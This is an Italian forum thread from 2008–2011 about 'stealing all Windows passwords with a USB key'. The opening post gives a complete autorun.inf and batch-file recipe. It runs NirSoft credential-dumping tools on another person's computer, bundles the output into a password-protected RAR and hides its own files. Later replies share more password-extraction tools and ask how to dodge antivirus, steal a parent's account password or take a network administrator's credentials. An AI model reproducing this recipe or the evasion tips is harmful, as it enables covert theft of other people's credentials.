Visualizza la versione completa : [exe] PROGRAMMI per rubare tutte le password di Windows con una chiave USB

katramina
29-07-2008, 23:31
[Only registered and activated users can see links]

rubare tutte

le password di Windows

con una chiave USB

MessenPass _ Mail PassView _ Siw _ Asterisk Logger _ IE PassView _ PasswordFox _ ChromePass _ Network Password Recovery _ Dialupass

katramina
29-07-2008, 23:42
Il sito web Nirsoft ([Only registered and activated users can see links]) fornisce diversi programmi gratuiti per recuperare le password salvate nel computer che si sta usando nel caso in cui le si dimenticano. E’ possibile però usare questi programmi gratuiti per altri scopi, come rubare le password del computer che si sta utilizzando.

Se un malintenzionato ha accesso fisico al computer da cui rubare le password, ha a disposizione solo pochi secondi per compiere l’”operazione”. Da questa necessità, ecco l’idea di usare una chiavetta USB. Con questo articolo, voglio semplicemente farvi vedere come sia facile creare una chiavetta USB che, inserita nel computer che ci interessa, salva le password trovate all’interno della chiavetta stessa.

Così facendo, basta collegare la chiavetta al computer che ci interessa, fare un semplice click e dopo qualche secondo staccare la chiavetta ed allontanarci dal computer con le password. Per realizzare questa chiavetta USB speciale, prima di tutto, create una cartella sul vostro desktop con il nome di Chiavetta. Questa cartella conterrà tutti i file che andranno copiati nella chiavetta.

Collegatevi alla pagina del sito web di Nirsoft per scaricare i programmi per recuperare le password. Vi consiglio di scaricare solo i programmi che vi recuperano le password che vi interessano. Se avete intenzione, ad esempio, di recuperare solo le password dei programmi di chat e quelli delle e-mail, scaricate i programmi MessenPass e Mail PassView.

Dopo aver scaricato i pacchetti con i programmi per recuperare le password, estraeteli nella cartella Chiavetta. In questa cartella lasciate solo i programmi veri e propri: cancellate, in breve, gli altri file come il readme.txt o la guida di utilizzo del programma.

A questo punto, scaricate ed installate l’ultima versione di Winrar. Andate su questa pagina e fate click sulla voce WinRAR 3.60 ([Only registered and activated users can see links]) (Graphic and command line). Dopo aver installato Winrar, andate su Start/Risorse del computer/C:/Programmi/WinRAR, copiate ed incollate il programma Rar.exe nella cartella del desktop Chiavetta.

Adesso aprite il Blocco Note, andando su Start/Tutti i programmi/Accessori/Blocco note, e scrivete la seguente riga per ogni programma che recupera le password che avete inserito nella cartella Chiavetta:

@nomedelprogramma.exe /sverhtml nomedelprogramma.html

Al termine del file scrivete, invece, le righe:

REM Scrittura del file di log
@echo COMPUTERNAME = %COMPUTERNAME% > log.txt
@echo USERNAME = %USERNAME% >> log.txt
@echo USERDOMAIN = %USERDOMAIN% >> log.txt
@echo USERPROFILE = %USERPROFILE% >> log.txt
@echo. >> log.txt
@echo Oggi e’ %DATE% e sono le %TIME% >> log.txt

REM Compressione
@rar.exe a -pPASSWORD backup_%random%.rar *.html log.txt > nul

REM Eliminazione e celamento dei file usati
@del *.html
@del log.txt
@attrib +h *.exe
@attrib +h autorun.inf

In breve, quando avvierete questo piccolo programmino, le password verranno recuperate dal computer e salvate in diversi file .HTML. A questo punto, questi file HTML vengono inseriti in un archivio .RAR protetto da password. La password dell’archivio deve essere specificata al posto della parola PASSWORD.

La password è case sensitive: fanno differenza, quindi, le lettere maiuscole e quelle minuscole. Alla fine i programmi utilizzati per recuperare le password vengono nascosti e le pagine HTML eliminate, poichè già inserite nell’archivio .RAR. Nel mio caso (programmi MessenPass e Mail PassView), ho scritto queste righe:

@mspass.exe /sverhtml mspass.html
@mailpv.exe /sverhtml mailpv.html

REM Scrittura del file di log
@echo COMPUTERNAME = %COMPUTERNAME% > log.txt
@echo USERNAME = %USERNAME% >> log.txt
@echo USERDOMAIN = %USERDOMAIN% >> log.txt
@echo USERPROFILE = %USERPROFILE% >> log.txt
@echo. >> log.txt
@echo Oggi e’ %DATE% e sono le %TIME% >> log.txt

REM Compressione

REM Eliminazione e celamento dei file usati
@del *.html
@del log.txt
@attrib +h *.exe
@attrib +h autorun.inf

Alla fine, salvate il file con il nome lancia.bat: andate semplicemente su File/Salva file con nome… e, nella finestra che si apre, scrivete lancia.bat in Nome file e selezionate Tutti i file in Salva come. Il file deve essere salvato nella Chiavetta.

Dopo aver creato il file lancia.bat, create il file autorun.inf sempre con il Blocco note:

[autorun]
open=lancia.bat
action=Preleva password

A questo punto avete finito. Nella cartella troverete i seguenti file:

Dovete semplicemente copiare tutti i file nella cartella principale della vostra chiavetta USB per concludere la sua creazione. Se volete fare delle prove, dopo aver copiato i file, estraete ed inserite la chiavetta. Verrà aperta la seguente finestra:

Se selezionate la prima voce (Preleva password) e fate click sul tasto OK, le password del computer verranno salvate all’interno dell’archivio protetto .RAR. A questo punto, basta staccare la chiavetta ed andare in un computer sicuro con Winrar installato per leggere le password trovate.

L’articolo è stato aggiornato rispetto alla pubblicazione iniziale, grazie all’aiuto del blogger Alessandro Ferrari, che ha revisionato il codice .BAT. L’articolo è puramente a scopo di studio e l’autore non si ritiene responsabile per eventuali usi impropri. Rubare password che non siano le proprie non è legale.

L’articolo è stato aggiornato rispetto alla pubblicazione iniziale, grazie all’aiuto del blogger Alessandro Ferrari, che ha revisionato il codice .BAT. L’articolo è puramente a scopo di studio e l’autore non si ritiene responsabile per eventuali usi impropri. Rubare password che non siano le proprie non è legale.

(fonte salvatore-aranzulla.com via Mon***tech)

VITODIGUARDO
20-10-2008, 09:38
Aggiornamento Versioni

mspass 1.24 italiano
mailpv 1.45 italiano

Allego versioni aggiornate in lingua italiana

:ipma

puffipuffi
20-10-2008, 14:13
Allora... ladruncoli e spioni delle figlie... io uso questo programmino ...che oltre a raccontarvi morte e miracoli del vs. pc in " segreti" vi svela le pass . spero vi piaccia

Hotgar
26-10-2008, 18:38
La pwd per il rar è quella che lo crea.
Quella impostata nel file Bat e entro questo personalizzabile

REM Compressione

@rar.exe a -pAlìBabà&i40Ladroni backup_%random%.rar *.html log.txt > nul

gabs
12-11-2008, 14:10
Aggiornamento Versioni

mspass 1.24 italiano
mailpv 1.45 italiano

Allego versioni aggiornate in lingua italiana

:ipma
ciaoo il programma mspass e un virus hacktool.passreminder di livello alto...

luca_3_93
26-12-2008, 09:16
Aggiornamento Mail PassView v1.46

arzilloarzillo
20-01-2009, 09:29
c'è un modo per evitare che alcuni antivirus cancellino i programmi contenuti nella chiavetta prima che vengano eseguiti? magari inserirli in un'archivio protetto... provandolo sul mio pc funziona solo se disattivo la protezione in tempo reale...

luca_3_93
26-01-2009, 18:36
Mail PassView v1.50

Changelog :

Aggiunto il supporto per Windows Live Mail.

K0br4
11-02-2009, 15:36
Bello stò trhead.... :m intrigante... ;)

Allora vediamo... mailpass è alla vers. 1.50, e va bene.... :m magari mi permetto solo di aggiungere un immaginetta...

poi vediamo.... Asterisk Logger è alla vers. 1.04... ma dov'é? :nain non lo vedo!!! e IEPassView pure!!! Dov'è??? :m

Ok, allora quelli li metto io..... ;)

K0br4
11-02-2009, 15:46
;) Asterisk Logger v1.04 [ITA] ;)

Asterisk Logger è un programma in grado di rivelare molto facilmente le password nascoste dagli asterischi, gira su Windows 9x, ME, 2000 mentre non è stato ancora testato su Vista; si cercano volontari. ;)

Asterisk Logger inserisce le password salvate in un file di log, posizionandole alla destra del nome del programma per le quali sono usate.
Purtroppo, uno dei problemi noti dovuti all'uso di questo programma è che lo stesso viene identificato da quasi tutti gli antivirus in circolazione come infetto da Virus/trojan.

:ipbest

K0br4
11-02-2009, 15:52
:prr IE PassView v1.15 [ITA] :prr

IE PassView è una piccolissima utility in grado di rivelare le password archiviate nel Browser Internet Explorer.

Internet Explorer è supportato dalla versione 4.0 fino alla 7.0 compresa, mentre è solo ancora parziale (ed in fase di alpha test) il supporto per la neonata versione 8.0. 2thumbsup

:okappa

K0br4
11-02-2009, 16:01
:kapo
PasswordFox v1.11 [ITA] :kapo

PasswordFox è il "cugino" di IE PassView, realizzato per la "par condicio" nei confronti di Firefox. :brf
Come d'altronde è facile capire, questo programma è stato creato per gli stessi scopi di IE PassView: riuscire a leggere le informazioni relative alle password salvate ed archiviate in Firefox.

Per ognuna di queste password, è possibile risalire alle informazioni relative all'UserName usato, la password abbinata ed ovviamente al sito sul quale dette credenziali d'accesso sono state utilizzate. ;)

:ipbest

K0br4
11-02-2009, 16:09
:ipma ChromePass v1.05 [ITA] :ipma

Abbiamo visto IE PAssView (per Internet Explorer), PasswordFox (per Firefox), ed ecco ChromePass, per gli stessi scopi ma "operativo" nei confronti del browser web di casa Google. :ah

2thumbsup

K0br4
11-02-2009, 16:17
:ihih Network Password Recovery v1.20 [ITA] :ihih

Ed ecco un altra "perla": Network Password Recovery è un semplice e piccolissimo programma che vi permetterà di rivelare tutte le password salvate per le vostre connessioni di rete.

Network Password Recovery vi permetterà di visualizzare le password relative a:

Login e passwords di computer remoti nella vostra LAN;
Passwords di account email su Server Exchange (archiviate in Outlook 2003);
Password di account MSN Messenger e Windows Messenger;
Password archiviate in Remote Desktop.

:ilove:

K0br4
11-02-2009, 16:23
:ipbest Dialupass v3.01 [ENG] :ipbest

Questo programmino vi permetterà di visualizzare i dettagli di login di tutti gli account per connessioni dialup e VPN esistenti sul vostro computer.
Dialupass mostrerà l'UserName, la Password e il dominio d'accesso.

:ihih

K0br4
15-03-2009, 19:53
:ihih MessenPass v1.24 :ihih

MessenPass è una piccola utility creata sempre dalla medesima software house, utile per "recuperare" le password dei principali programmi di Instant Messaging, memorizzate ed in seguito dimenticate.
Il funzionamento è semplicemente disarmante, visto che basta lanciare l'eseguibile.

MessenPass, riesce a recuperare le password salvate di:

MSN Messenger
Windows Messenger (In Windows XP)
Windows Live Messenger (In Windows XP And Vista)
Yahoo Messenger (Versions 5.x and 6.x)
Google Talk
ICQ Lite 4.x/5.x/2003
AOL Instant Messenger v4.6 or below, AIM 6.x, and AIM Pro.
Trillian
Miranda
GAIM/Pidgin
MySpace IM
PaltalkScene
Digsby

MessenPass è Freeware. 2thumbsup

K0br4
15-03-2009, 20:02
Aggiungo anche qui per completezza....

:ihih WirelessKeyView :ihih

.....per il quale però vi rimando al trhead specifico:

WirelessKeyView [+agg] recuperare le password dimenticate di una rete wifi ([Only registered and activated users can see links])

VirusT
19-03-2009, 14:15
raga come si avviano glia ltri programmi? cioè copio l'exe nella cartella quando si avvia mi da solo le psw di e-mail e msn...

K0br4
19-03-2009, 14:28
Sono tutte applicazioni che puoi copiare su una pen drive e lanciare direttamente dalla stessa senza alcuna installazione, sono applicazioni stand-alone.

Ovviamente poi le dovrai lanciare dal pc sul quale intendi recuperare le password che ti occorrono... ;)

Il funzionamento non necessita di particolari accorgimenti e/o spiegazioni: lanci il programma, e ti visualizza le password che trova. Se non visualizza nulla si vede che non ci sono password memorizzate oppure il programma non è riuscito a decodificarle/leggerle. ;)

puffipuffi
19-03-2009, 14:31
ecc.ecc.[/COLOR][/B][/URL]

...KOBRA... povere le tue figlie se ne hai... sono spacciate con te!!!!... rep per te ho scaricato diversi dei tuoi programmi

K0br4
19-03-2009, 15:04
...KOBRA... povere le tue figlie se ne hai... sono spacciate con te!!!!... rep per te ho scaricato diversi dei tuoi programmi

Ne ho una.... una cucciolotta di tre anni e mezzo... la vita mia... :cuork

nooo tranquilla puffipuffi.... la mia bimba crescerà sapendo di poter contare (almeno finchè Dio vuole...) sul suo papà, che le insegnerà amorevolmente piano piano tutto ciò che sa, informatica compresa.... e Lei non gli dirà mai bugie... non ne avrà bisogno... (almeno spero..)

diverso è il discorso nei confronti del ragazzo.... se e quando ne porterà a casa uno.... :sorv

Comunque sono d'accordo nell'esercitare sempre una certa sorveglianza, che più che di nascosto può sempre essere "somministrata" come semplici lezioni o nozioni di prevenzione.... Internet è come una città.... c'è la gente per bene, i locali buoni.... e poi ci sono i bassifondi, il cosiddetto "underground"... la gente malfamata....

Vabbè... sono andato abbastanza ot.... ;)

VirusT
20-03-2009, 20:58
A me funziona solo quella di msn e l'email... gli altri ceh avete messo durante la discussione vorrei farli partire con los tesso procedimento con il lancia.bat.... bisogna fare qualcosa?

Zac92
18-04-2009, 10:56
Troppo sborone :-)Ma questo programma prende le password di un solo utente.? O di tutti gli utenti?

krokkio
18-04-2009, 11:49
Troppo sborone :-)Ma questo programma prende le password di un solo utente.? O di tutti gli utenti?

Questi sw dovrebbero accaparrarsi tutte le pw presenti sul pc...

K0br4
18-04-2009, 14:37
Giusto ciò che dice Krokkio 2thumbsup a condizione però che l'account con il quale lo si utilizza goda di privilegi amministrativi.... ;)

Zac92
18-04-2009, 14:41
Giusto ciò che dice Krokkio 2thumbsup a condizione però che l'account con il quale lo si utilizza goda di privilegi amministrativi.... ;)

ah cavolo.. Se no potevo andare a scuola e combinare un po' di casini.:-) ahaha..

mazzo
18-04-2009, 18:49
Problema...allora..in Windows Vista quando parte l'autorun non c'è scritto recupera password...poi...ho provato nell' Xp ma non parte l'autorun...

Secondo problema..quando faccio lancia.bat parte l'installazione di mail passView, se faccio annulla tutto bene, ma perchè parte l'installazione?

Domanda: c'è un programma come questi che ti permette di recuperare la password di un account utente?

Edit:
Con mail passview ho risolto ;)

sterling
20-04-2009, 11:54
ragazzi una domanda: ma Asterisk Logger e IE PassView vanno implementati nella procedura che si trova al primo post o sono programmi indipendenti che non hanno nulla a che fare col primo post?
Dico questo perchè la guida iniziale (anche se ottimamente stilata) per me è un po impegnativa da realizzare, tutto qui.
Grazie delle eventuali risposte.

K0br4
20-04-2009, 12:07
Puoi anche usarli indipendentemente. ;)

sterling
20-04-2009, 12:59
Puoi anche usarli indipendentemente. ;)
Benissimo, grazie della risposta kobra....rep+ per te intanto.
Ora non mi resta che capire come fare però.....ho scompattato ad esempio IE PassView ed all'interno della cartella ci sono 3 file: un HTML, un file .ini e l'eseguibile. Come uso tutto ciò?
Perdonate le domande ma non so proprio da dove iniziare ....spero in un anima pia :vn

K0br4
20-04-2009, 13:22
sterling devi semplicemente lanciare l'eseguibile, sarà il programma che provvederà ad andare a cercare automaticamente eventuali password memorizzate ed a mostrarle.

Tieni però presente due cose:

potresti non trovare elencata alcuna password, perchè molto semplicemente potrebbero non essere mai state salvate password su quel pc
ciò che fanno questi programmi, è un attività che molto spesso viene fatta per scopi illeciti (ad esempio se si cerca di "sbirciare" le password di altri utenti su altri pc, lo scopo non è per uso personale ;)), quindi spessissimo questi programmi vengono identificati dagli antivirus come virus o malware in genere. ;)

sterling
20-04-2009, 13:38
Grazie ancora della pazienza Kobra....quindi metto la cartella scompattata nella pendrive, inserisco quest'ultima nel pc "incriminato" ed avvio l'eseguibile.
Faccio una prova sul mio pc.....mi turba solo il fatto che altri eventuali pc potrebbero essere spenti :dub....quindi nisba?

K0br4
20-04-2009, 14:10
no, attenzione sterling, il programma ha "effetto" solamente sul pc su cui viene eseguito, e per i migliori risultati inoltre, ha necessità d'essere lanciato con privilegi amministrativi, ovvero con un account di Amministratore locale. ;)

Non funziona su altri pc collegati in rete, ma solo sul pc sul quale viene eseguito. :nq

sterling
20-04-2009, 14:29
Quindi il pc dove si vuol "recuperare" la passw (magari di IE) deve essere acceso in tutti i casi?

K0br4
20-04-2009, 14:33
L'applicazione deve esser fatta girare sul pc sul quale si vuol recuperare la password: funziona solamente su quel pc.
Per recuperarla da altri pc dovrai ripetere la stessa operazione su ognuno dei pc dai quali vuoi recuperare la password.

mazzo
20-04-2009, 14:34
no, attenzione sterling, il programma ha "effetto" solamente sul pc su cui viene eseguito, e per i migliori risultati inoltre, ha necessità d'essere lanciato con privilegi amministrativi, ovvero con un account di Amministratore locale. ;)

Non funziona su altri pc collegati in rete, ma solo sul pc sul quale viene eseguito. :nq
Kobra ho una domanda...quale tra questi programmi permette di recuperare la password di un account utente?

Zac92
20-04-2009, 15:08
Come faccio a scoprire la password degli account del mio computer.? Mio babbo mi ha messo la password negli account e non posso entrare.:-( se qualcuno mi illuminasse gliene sarei grato:-)

Piter91
20-04-2009, 21:37
2thumbsupgrandi post questi...cmq le password una volta catturare dv vengono salvate ??
cioè dove è ke le devo scompattare ?? nn le trovo !
richiedo la stessa domanda di Zac92 ([Only registered and activated users can see links])...sarebbe utile...:okappa
grazie in anticipo ciaoooooo

:tnx:funz

K0br4
20-04-2009, 21:53
Zac92, Piter91: le password, se trovate, vengono mostrate e basta, non vengono salvate; infine, ripeto per l'ultima volta che le password di tutti gli account dei pc vengono mostrate solamente se si esegue il programma con un account in possesso di privilegi amministrativi (dovete usare l'account dell'Administrator, altrimenti nisba).

mazzo: dipende da quali password dell'utente vorresti recuperare; e comunque il programma deve sempre essere eseguito con l'account dell'Administrator.

Zac92
20-04-2009, 22:14
adesso sono accesso dall'amminastratore...forse ho sbagliato a fare il procedimento!!! ora riprovo!!!

mazzo
21-04-2009, 16:43
Ho lo stesso problema di Zac92:ah
Mio babbo ha messo la password nel computer e io devo scoprirla2thumbsup
Quale tra questi programmi fà recuperare la password dell' account?

A volte mio babbo accende il computer e lo lascia acceso, quindi posso farlo dal suo account, perchè sò che da un' altro account non sarebbe possibile...però non so quale di questi programmi recupera quella password...

superalby69
21-04-2009, 16:59
Potete provare anche a fare così:
Senza le necessità di utilizzare programmi precedentemente descritti. Accedete al vostro classico account con privilegi di amministratore, e seguite queste semplici istruzioni:

Accedi come amministratore: log on all’account di cui si conosce la password e che ha privilegi di amministratore.
Apri gestione utente: Start/Esegui/control userpasswords2 e clicca OK.
Portati sull’account: vai sull’account di cui vuoi recuperare la password.
Resettare la password: e clicca Reset Password.
Nuova password: inserire la nuova password-confermarla e cliccare OK.

Ovviamente l'account che dovete resettare è il vostro, mettendoci poi una password che conoscete e se desiderate potete cambiare anche i privilegi.

Oppure:
Procedete in questo modo:

Riavviate il Computer in "Modalità Provvisoria" (tenendo premuto il tasto F8 all'avvio del Pc e selezionare Modalità Provvisoria). Entrate come "ADMINISTRATOR" poi aprite il Pannello di Controllo ed accedete ad "Account Utente". Da lì, se il tuo Account è presente, non devi far altro che selezionarlo, cliccare su "Cambia Password" ed inserire dei nuovi parametri.

Un altro modo è quello di creare un nuovo Account tipo "Amministratore Computer" e riavviate il sistema. Entrate con il nuovo Account creato e andate su "Account utente" dove potrete vedere tutti i profili presenti sul Pc. Scegliete quello dove avete dimenticato la Password e cambiatela come indicato sopra.

Tutto questo perchè per cambiare una Password, il tutto è legato al ruolo con cui si accede ad un Computer. Appunto per questo un utente con Accesso Limitato può cambiare solo la sua, mentre un Amministratore può cambiarle tutte.

Zac92
21-04-2009, 22:12
Grazie mille superalby69 x la guida.;-) adesso non vedo l'ora di provarla.:-) poi t faccio sapere se è efficacie o se riscontro eventuali problemi..

robyrxx
22-04-2009, 08:32
ciao a tutti volevo sapere dopo aver installato tutto, provo il tutto su un pc diverso
e quando clicco preleva passwod esce la tabella apri con volevo saper come devo fare se è un errore mio o è normale. anke perkè non trovo subito dopo l'archivio dlle password recuperate grazie ciaooo.

K0br4
22-04-2009, 09:22
:ihih LSA SecretsView Ver. 1.20 [ENG] :ihih

Applicazione decisamente più professionale e rivolta ad utilizzatori sicuramente più esperti, LSA SecretsView permette di accedere alle chiavi di registro dove sono memorizzate le password dei pc onde poterne prelevare il contenuto in valore esadecimale per successive analisi.
Si tratta sostanzialmente di un programma che NON mostra le password in chiaro. ;)

robyrxx
22-04-2009, 09:36
ciao K0br4 senti x quanto riguarda l'avvio del prog in autorun mi sapresti dare una mano riguarda il postato in prima pagina !!!!

K0br4
22-04-2009, 09:52
robyrxx spiegati meglio per cortesia, cosa intendi? :m
Mi sembra che Katramina abbia inserito una guida molto chiara ed esaustiva.... ;)

robyrxx
22-04-2009, 09:53
helppppp CHI MI PUO' DARE UNA MANO PER I PROGRAMMI !!!!!!!!!!!!!!!!!!!!!

robyrxx
22-04-2009, 09:55
Ok pero' non so il perke' mi da all'avvio con autoplay la tabella apri con
cosa devo fare????
E come faccio a vedere la cartella delle pass. Recuperate??

davik
29-04-2009, 23:09
scusate qualcuno potrebbe postare il programma "Rar.exe" che và messo nella chiavetta??:tnx

mazzo
30-04-2009, 10:19
Lo trovi su C:/programmi/winrar
Naturalmente si trova solo se hai winrar...se proprio non lo trovi te lo posto oggi pomeriggio, perché adesso sono dal cell.:)
Edit:
Eccolo qui
RAR.EXE ;)

mazzo
15-05-2009, 18:41
Scusate qualcuno sa qual'è il programma che trova la password dell'account?

falco58s
17-05-2009, 13:30
Grazie mille....

K0br4
19-05-2009, 11:04
VNCPassView Ver. 1.02 [ITA]

VNCPassView è un piccolo ed utile programma per recuperare le password archiviate in VNC.
VNCPassView può recuperare le password da due percorsi: le password archiviate per il corrente utente (solitamente ubicate in HKEY_CURRENT_USER nel Registro), e le Password archiviate per tutti gli utenti.

Kraven86
21-09-2009, 02:24
Esiste un comando "che potrebbe essere aggiunto nel bat" per disabilitare momentaneamente l'antivirus e riabilitarlo "sempre in automatico" alla fine del processo, altrimenti escono fuori 200 allert.
Mi rendo conto che per ogni antivirus il comado potrebbe essere diverso, ma è l'unica cosa che mi è venuta in mente per non far uscire fuori nessun allert.

Grazie.

Came
23-09-2009, 21:06
Io ho in problemino con i 2 file lancia.bat e autorun.inf
Quando li incollo nella root principale della chiavetta (formattata, ci sono solo questi file della guida) dopo 2 secondi mi spariscono!
Restano solo gli exe dei programmi delle password...ho anche abilitato la visualizzazione dei file nascosti, ma spariscono proprio senza nemmeno messaggi di antivirus ecc.
Cosa può essere?

_

Cliccando invece sul file lancia.bat che ho nella cartella chiavetta sul desktop del mio PC, esce questo messaggio che si chiude subito dopo:

Kraven86
24-09-2009, 08:09
Se l'errore te lo da su rar.exe evidentemente è perchè non riconosce il comando di compressione, controlla se il winrar che hai scaricato è "Graphic and command line" se scarichi solo graphic non ti riconosce i comandi.

gia3
13-10-2009, 13:35
Ciao a tutti , ho un problema ragazzi , capisco che non e' il 3ed giusto :legf , ma come si recupera una password da un file *.rar ? :grr:grr:grr
grazie . :cià

superalby69
13-10-2009, 14:55
Ciao a tutti , ho un problema ragazzi , capisco che non e' il 3ed giusto :legf , ma come si recupera una password da un file *.rar ? :grr:grr:grr
grazie . :cià
Prova con Zip Password Recovery oppure ZIP Password Finder oppure rar password c racker oppure 123 Password Recovery oppure Any Password oppure Lockbox, li trovi tutti sul web, forse qualcuno lo abbiamo anche qui sul forum, fai una ricerca.

gia3
14-10-2009, 16:47
Prova con Zip Password Recovery oppure ZIP Password Finder oppure rar password c racker oppure 123 Password Recovery oppure Any Password oppure Lockbox, li trovi tutti sul web, forse qualcuno lo abbiamo anche qui sul forum, fai una ricerca.

ciao super:sire , ti ringrazio per i suggerimenti ma ho capito che e' un'impresa a dir poco ardua :fuio, e non so' se approfondire , dati i scarsi risultati sino ad ora raggiunti :pp:pp:pp!!! peccato .... :pomb

thommys
03-01-2010, 11:34
Ciao a tutti
io non ricordo più la pass x collegarmi al mio router d-link
o meglio sono convinto di non averla impostata
ma quando cerco di collegarmi e lascio vuota la casella della pass
mi compare un messaggio che dice che devo mettere la pass
premetto che sui router dlink è settato su admin - admin
ma poi successivamente la pass l'ho impostata vuota x comodita
e da allora non riesco più ad entrare perchè non mi prende nessuna combinazione.
che programma mi consigliate per recuperarla...il piu semplice possibile.
grazie mille!!!

DJ72
03-01-2010, 12:56
esiste 1 programma x recuperare la password dell'amministratore do rete visto che mi ha bloccato la connessione internet, posso solo leggere la posta

K0br4
03-01-2010, 18:49
DJ72 fammi capire bene per cortesia, tu hai avuto delle lmitazioni al tuo account in una rete che ti impediscono di poter accedere ad internet, ma solamente di verificare la posta, giusto?

E per ovviare a queste limitazioni vorresti poter riuscire ad impossessarti dei dati d'accesso dell'amministratore della rete, giusto? :m

Mariu
03-01-2010, 20:56
Aggiornamento MessnPass v1.29:

Changelog:

Fixed MessenPass to work with the latest version of Miranda.

DJ72
09-01-2010, 09:22
DJ72 fammi capire bene per cortesia, tu hai avuto delle lmitazioni al tuo account in una rete che ti impediscono di poter accedere ad internet, ma solamente di verificare la posta, giusto?

E per ovviare a queste limitazioni vorresti poter riuscire ad impossessarti dei dati d'accesso dell'amministratore della rete, giusto? :m
Si è così inoltre nn ho i privilegi x installare certi programmi sempre x lo stesso motivo..

K0br4
09-01-2010, 17:36
Bè, ci saranno stati dei motivi se hanno scelto di applicare delle Policy così restrittive, no? :lol
Io non ti consiglio di spingerti oltre DJ72, la cosa oltre che illecita è molto rischiosa, dammi retta: lascia perdere gli Amministratori di Sistema, soprattutto ora che sono stati regolarmente investiti ed autorizzati anche ad effettuare implicitamente dei "controlli" sulle attività in LAN ed anche nei confronti degli utenti connessi dal Garante della privacy. ;)

Biggest
10-01-2010, 02:40
ragazzuoli, ho sfogliato un po' il thread.. ho visto che avete postato un mucchio di roba interessante.

sapete dirmi così su due piedi, quale sia il migliore? il più efficace?

non c'è nulla che agisca come un "fantasmino", ovvero in auto e senza mostrare alcun avviso o finestra?

xvincenzox
16-01-2010, 13:52
scusate perche a me di tutti quelli che avete postato mi funziona solo uno ?

Adhams
22-01-2010, 14:35
Reveal Passwords Masked Behind Asterisks AIO

Uppo su MegaUpload un All-In-One, Reveal Passwords Masked Behind Asterisks, che potrà esservi utile, con all'interno tutti i tools necessari, aggiornati, per mostrare il contenuto di password o stringhe nascoste dietro caratteri jolly (asterischi o altro).

All'interno del package troverete:

Asterisk *** v7.9
Asterisk Logger v1.04
Asterisk Master v1.0
AsterWin IE v1.03
IE Asterisk Password Uncover v1.2
Password Spectator v3.2
Password Viewer v1.4
ShowPassword v2.1
SS-PassUnleash

Download:

Download ([Only registered and activated users can see links])

Kirtash
04-04-2010, 20:36
Per caso... questo metodo funziona anche con winrar?...
Cioé, se un file scaricato ha una password e è in formato winrar, inserendo la chiavetta è possibile recuperare la password?

Ipmark
05-04-2010, 12:02
se un file scaricato ha una password e è in formato winrar, inserendo la chiavetta è possibile recuperare la password?

Magari...
Il recupero di una password di un file rar è estramente complicato e si può tentare solo con il metodo "brute force", che nel caso di password lunghe + di 8 caratteri comporta un'attesa di settimane se non di mesi anche con PC di ultima generazione.
Ci vuole anche un tool specifico, tipo RAR Password Recovery Magic o Advanced RAR Password Recovery, ma sono programmi a pagamento.

:wel

enzoooo
22-05-2010, 12:55
Per caso... questo metodo funziona anche con winrar?...
Cioé, se un file scaricato ha una password e è in formato winrar, inserendo la chiavetta è possibile recuperare la password?

qualche post prima e stata fatta la stessa domanda...e superalby69 aveva gia risp

Antonyqueens
08-10-2010, 01:49
Ciao ragazzi una domandona....io ho un file powerpoint protetto da password ma non é stato creato sul mio PC...esiste un modo per trovare la password e poterlo aprire???Resto in attesa di una vostra soluzione geniacci ;-D

superalby69
08-10-2010, 12:26
Ciao ragazzi una domandona....io ho un file powerpoint protetto da password ma non é stato creato sul mio PC...esiste un modo per trovare la password e poterlo aprire???Resto in attesa di una vostra soluzione geniacci ;-D
Puoi provare con PowerPoint Password Recovery oppure Office Password Recovery Magic ([Only registered and activated users can see links]) oppure SmartKey Password Recovery

kicca83
05-01-2011, 21:51
buonasera... volevo sapere se c'è un programma per recuperare la password di skype... perchè mi hanno cambiato il dominio della posta e non l'ho aggiornato sul sito di conseguenza se tento di farmi mandare il link per il ripristino password non mi arriva l'email... non c'è un modo senza dover contattare loro?

Reju
21-01-2011, 10:50
buonasera... volevo sapere se c'è un programma per recuperare la password di skype... perchè mi hanno cambiato il dominio della posta e non l'ho aggiornato sul sito di conseguenza se tento di farmi mandare il link per il ripristino password non mi arriva l'email... non c'è un modo senza dover contattare loro?

stesso identico problema!!!

K0br4
21-01-2011, 11:06
Che io sappia la password è possibile resettarla ufficialmente da qui
[Only registered and activated users can see links] che però ve la invia per email.
Se l'email vecchia però non è disponibile, vedete se potete farvela riattivare temporaneamente, oppure se potete farvi attivare un redirect delle email dal vostro vecchio indirizzo ad un altro indirizzo email.... giusto il tempo per recuperare la password.

Altrimenti so che c'è in giro uno strumentino, un programmino che permette di accedere alla password eventualmente memorizzata sul pc, il problema è che è un programma a pagamento e non ne conosco nè le funzionalità nè tanto meno le limitazioni della versione demo. Per trovarlo, basta che cercate in google il seguente testo: Skype Password: password recovery tool for Skype ;)

Reju
21-01-2011, 11:20
Che io sappia la password è possibile resettarla ufficialmente da qui
[Only registered and activated users can see links] che però ve la invia per email.
Se l'email vecchia però non è disponibile, vedete se potete farvela riattivare temporaneamente, oppure se potete farvi attivare un redirect delle email dal vostro vecchio indirizzo ad un altro indirizzo email.... giusto il tempo per recuperare la password.

Altrimenti so che c'è in giro uno strumentino, un programmino che permette di accedere alla password eventualmente memorizzata sul pc, il problema è che è un programma a pagamento e non ne conosco nè le funzionalità nè tanto meno le limitazioni della versione demo. Per trovarlo, basta che cercate in google il seguente testo: Skype Password: password recovery tool for Skype ;)
ho provato la versione demo di quel programma ma non trova nulla...

K0br4
21-01-2011, 11:22
Io non ho skype qui, ed in ogni caso non salvo mai nessuna password: anche doverla digitare ogni volta è un ottimo sistema per tenerla a mente.... :)

Non so che dirti, proverò a chiedere in giro se c'è qualcosa di più funzionale... ;)

Ipmark
21-01-2011, 11:55
@kicca83
@Reju

Provate questo tool

Download ([Only registered and activated users can see links])

:wel